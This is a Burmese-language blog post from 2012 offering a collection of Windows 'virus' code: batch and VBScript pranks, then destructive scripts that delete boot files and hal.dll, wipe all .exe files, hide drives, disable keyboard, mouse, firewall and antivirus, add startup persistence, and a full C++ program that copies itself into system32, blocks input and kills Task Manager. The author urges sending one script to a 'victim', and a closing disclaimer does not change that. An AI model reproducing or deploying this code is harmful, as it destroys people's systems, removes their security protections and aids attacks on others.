Tuesday, 4 September 2012


ALL VIRUS CODE


10 virus in notepad


သတိေအာက္ပါကုတ္မ်ားသည္ notepad ေပၚတြင္သံုးႏိုင္သည္။
ပထမဆံုးသင့္ notepad ဖြင့္ပါ။
ေအာက္ကကုတ္ေတြကို notepad ေပၚတင္ပါ
မေၾကာက္ပါနဲ႕ အေသးစားေလးေတြပါ။
သင္ကိုယ္တိုင္ဖြင့္မွ ပြင့္ႏိုင္မယ့္ program ေလးေတြပါ။
1)သင့္ CD Drive ကိုဆက္တိုက္ပြင့္ေနပါလိမ့္မယ္။ဖြင့္လိုက္ပိတ္လိုက္ေပါ့။
code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ
2) Caps Lock ကိုဆက္တိုက္ဖြင့္လိုက္ပိတ္လိုက္လုပ္ေနပါလိမ့္မယ္။
code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ
3) ဒါေလးကသင့္ကြန္ျပဴတာကို မက္ေဆ့ ေပးျပီး shutdown က်သြားေစပါတယ္။
code :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ
4) Enter key ကိုဆက္တိုက္ႏွိပ္ေနမွာပါ။
code :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ.
5) CMD နဲ႕ Notepad ေတြရပ္မရေအာင္ဆက္တိုက္ဖြင့္တာေလးပါ။ဒါေလးကနဲနဲေလးဆိုးတယ္။
code:
@echo off
:A
start cmd
start notepad
goto :A
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ..
6) Backspace တိုက္ပြင့္ေနမွာပါ။သင္စာရိုက္လို႕မရပါ။
code :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ
7) သင့္ keyboard ေလးကိုဟက္ျပီး သင္ဟာအရူးဆိုျပီးသင္စာရိုက္တိုင္းေပၚေနမွာပါ။
code:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ
8. Notepad ကိုဆက္တိုက္ပြင့္ေနမွာပါ။
code:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ
9) ေအာက္ကျဖစ္စဥ္ေတြကိုလုပ္ေပးမယ့္ program ေလးပါ။ေပးလာမယ့္ မက္ေဆ့ေတြကကၽြန္ေတာ္ထင္ သလိုေရွာက္ေရးထားတာပါ။
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
code:
@echo off
title The end of the world
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ
10) Lighting .bat
သင့္ ေမာ္နီတာဟာဘာမွ မျမင္ရပဲ လင္းလက္ေနတဲ့ ဖန္သားျပင္ကိုသာျမင္ရမွာပါ။
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg
သင္ျပန္ထြက္ခ်င္ရင္ CTRL-ALT-DELETE နဲ႕ျပန္ထြက္လိုက္ပါ။
ေအာက္ကကုတ္ဆိုရင္ အဲဒါနဲ႕မရပါ။ctrl+shirt+esc နဲံ႕ရမယ္။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg
goto a
ကဲ သူငယ္ခ်င္းမ်ားကဲႏိုင္ၾကပါေစ

:Batch Virus Code To Disable All Harddisk::..

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by MyanmarHackersUnite4m!\" -f


.bat နဲ႔ save ပါ...ကိုယ္႔ victim ဆီကို ပို႔ေပးႏိူင္ပါျပီ...


Evil Batch::...

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


notepad ထဲ copy/paste ျပီး .bat နဲ႔ save ပါ ... run လိုက္တာနဲ႔ computer ကို shutdown က်ေစပါလိမ္႔မယ္...shutdown က်တာနဲ႔တစ္ျပိဳင္နက္ computer reboot တက္ဖို႔နဲ႔ restart တက္ဖို႔လိုအပ္တဲ႔ file ေတြကို တစ္ခါထဲ delete သြားပါလိမ္႔မယ္...

Enjoy! 
REMEMBER - DO NOT CLICK THIS FILE.
Do not try this on your own risk.
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Best:BAT virus code(Psat-2)

Delete hal.dll
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
rem ---------------------------------


Delete all .exe files in the computer
Code: Select all
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------


Self Destruct
Code: Select all
@ echo off
rem ---------------------------------
rem Self Destruct
del /f /q %0
rem ---------------------------------


Disable win Backup
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Windows Backup
net stop "SDRSVC"
rem ---------------------------------


Disable internet
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Internet
@Echo off & @@Break Off
Ipconfig /release
%jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?!
P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease%
rem ---------------------------------


Disable Keyboard
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------


Disable Mouse
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


Disable win Security
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Windows Security
net stop "security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
rem ---------------------------------


Kill Antivirus
Code: Select all
@ echo off
rem ---------------------------------
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------


Disable win defender
Code: Select all
@ echo off
rem ---------------------------------
rem Disable Windows Defender
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
rem ---------------------------------


Infect Reg Run Key
Code: Select all
@ echo off
rem ---------------------------------
rem Infect Reg Run Key
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------


Infect Autoexec.bat
Code: Select all
@ echo off
rem ---------------------------------
rem Infect Autoexec.bat
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
rem ---------------------------------


Infect Startup folder
Code: Select all
@ echo off
rem ---------------------------------
rem Infect Startup Folder
copy %0 "%userprofile%\Start Menu\Programs\Startup"
rem ---------------------------------


Confuse File Extensions
Code: Select all
@ echo off
rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------


BSOD(Blue screen of death)
Code: Select all
@ echo off
rem ---------------------------------
rem Activate Blue Screen Of Death
@((( Echo Off > Nul ) & Break Off )
    @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul
    @Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*"
)
rem ---------------------------

ေအာက္ကCodeေတြကို notepad ေပၚတင္ပါမေၾကာက္ပါနဲ႕ အေသးစားေလးေတြပါ။မိမိကိုယ္တိုင္ဖြင့္မွ ပြင့္ႏိုင္မယ့္ program ေလးေတြပါ။

1-သင့္ CD Drive ကိုဆက္တိုက္ပြင့္ေနပါလိမ့္မယ္။ဖြင့္လိုက္ပိတ္လိုက္ေပါ့။
  code:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do

if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

2Caps Lock ကိုဆက္တိုက္ဖြင့္လိုက္ပိတ္လိုက္လုပ္ေနပါလိမ့္မယ္။ 
  code:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

3ဒါေလးကသင့္ကြန္ျပဴတာကို မက္ေဆ့ ေပးျပီး shutdown က်သြားေစပါတယ္။
code :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ

4.Enter key ကိုဆက္တိုက္ႏွိပ္ေနမွာပါ။
code :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ.

5.CMD နဲ႕ Notepad ေတြရပ္မရေအာင္ဆက္တိုက္ဖြင့္တာေလးပါ။ဒါေလးကနဲနဲေလးဆိုးတယ္။
code:
@echo off
:A
start cmd
start notepad
goto :A 
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ..

6) Backspace တိုက္ပြင့္ေနမွာပါ။သင္စာရိုက္လို႕မရပါ။
code :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

7.သင့္ keyboard ေလးကိုဟက္ျပီး သင္ဟာအရူးဆိုျပီးသင္စာရိုက္တိုင္းေပၚေနမွာပါ။
  code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

ဒီဟာေလးကို ( .vbs) နဲ႔ေဆ့ပါ

8. Notepad ကိုဆက္တိုက္ပြင့္ေနမွာပါ။
  code:

@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ

9.အာက္ကျဖစ္စဥ္ေတြကိုလုပ္ေပးမယ့္ program ေလးပါ။ေပးလာမယ့္ မက္ေဆ့ေတြကကၽြန္ေတာ္ထင္ သလိုေရွာက္ေရးထားတာပါ။

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
  code:

@echo off 
title The end of the world
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

ဒီဟာေလးကို ( .bat) နဲ႔ေဆ့ပါ


10.Lighting .bat

သင့္ ေမာ္နီတာဟာဘာမွ မျမင္ရပဲ လင္းလက္ေနတဲ့ ဖန္သားျပင္ကိုသာျမင္ရမွာပါ။

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg

သင္ျပန္ထြက္ခ်င္ရင္ CTRL-ALT-DELETE နဲ႕ျပန္ထြက္လိုက္ပါ။

ေအာက္ကကုတ္ဆိုရင္ အဲဒါနဲ႕မရပါ။ctrl+shirt+esc နဲံ႕ရမယ္။
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>z.dbg
echo g=100>>z.dbg
echo q>>z.dbg
debug <z.dbg>nul
del z.dbg
goto a

  • တိုက္ခိုက္မႈ ၾကမ္းတဲ့Virus မ်ား

ဒါလည္း စမ္းလို႔ေကာင္းတဲ႔အမ်ိဳးအစားထဲမွာေတာ့ မပါ ပါဘူး။ သူရဲ႕တိုက္ခိုက္မႈက နည္းနည္းၾကမ္းတယ္ဗ်။ ဒီVirus ရဲ႕ Include header ဖိုင္ေတြကေတာ့ iostream,stdio,windows,winable,conio နဲ႔ ctime တို႔ျဖစ္ပါတယ္။
monitor ကို Turn off ျဖစ္သြားေအာင္ လုပ္ဖို႔အတြက္ ေအာက္က code ေတြကို အသံုးျပဳထားပါတယ္...



void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}


ေနာက္တခုက rand var's ႏွစ္ခုျပဳလုပ္ျပီး တိုက္ခိုက္ခံရသူရဲ႕ mouse ကို crazy ျဖစ္သြားေအာင္ လုပ္တာပါ။ အဲဒီ code ေတြကေတာ့....

void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}


ေနာက္တခုက open ခ်င္ရာေတြေလွ်ာက္ open ေနေအာင္ လုပ္တာပါ။ အဲဒါကို OpenStuff လို႔ေျပာၾကပါတယ္။ ေအာက္က code ေတြကိုၾကည့္ပါ။

void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE);
}


ေအာက္မွာရွိတဲ႔ code ေတြကေတာ့ Find windwos မွာ by name ေပးျပီး သူတို႔ကို ပ်က္စီးသြားေအာင္ ဖ်က္ဆီးျခင္း နဲ႔ windows title ေတြကို rename ေပးျပီး close သြားေအာင္ လုပ္တာပါ။ FindWindow command ေတြကို ပ်က္ျပယ္သြားေအာင္၊ မပ်က္ျပယ္ဘူး ဆိုရင္ေတာင္ command တခုေပးျပီး windon ကိုု open ပါလိမ့္မယ္။ code ေတြကို ေလ့လာၾကည့္ပါ...

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}


ေနာက္တစ္ခုကေတာ့ Windows စတက္လာတာနဲ႔ Virus ကို run ေနေစေအာင္registry ထဲမွာVirus ကို Add တဲ႔ code ေတြျဖစ္ပါတယ္...

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);


ေနာက္ဆံုးတစ္ခုကေတာ့ computerရဲ႕ beep ကို rand numbers ေတြအားျဖင့္ ကြဲျပားျခားနားတဲ႔ freq ေတြ lengths ေတြနဲ႔ ထြက္ေပၚေနေအာင္လုပ္တာပါ...

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}


ဒီ Virus ရဲ႕ code အျပည့္အစံုကို ေအာက္မွာေဖာ္ျပေပးထားပါတယ္။ ေလ့လာၾကည့္ပါ...

#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <winable.h>
#include <conio.h>
#include <ctime>
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}


(Educational Purposes Only)

  • Hal.dll ဖိုင္ကို deletes လုပ္တဲ႔ virus

ဒီ virus ကေတာ့ Hal.dll ဖိုင္ကို deletes လုပ္တဲ႔ virus ပါ။ virus စအလုပ္လုပ္ျပီး ဖိုင္ကို deleting လုပ္ျပီးျပီးဆို တာနဲ႔ Virus တိုက္ခိုက္ခံရတဲ႔ ကြန္ျပဴတာဟာ Shuts down က်သြားပါလိမ့္မယ္။ ျပီးရင္ ျပန္ဖြင့္လို႔မရေတာ့ပါဘူး။ စမ္းသပ္ဖို႔မေကာင္းတဲ႔ Virus တမ်ိဳးပါပဲ... ကိုယ့္ဆီမွာလည္း မစမ္းနဲ႔ သူမ်ားကြန္ျပဴတာကိုလည္း သြားမစမ္း တာ ေကာင္းတာပါပဲ။

Orginal Code ကေတာ့ ......

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

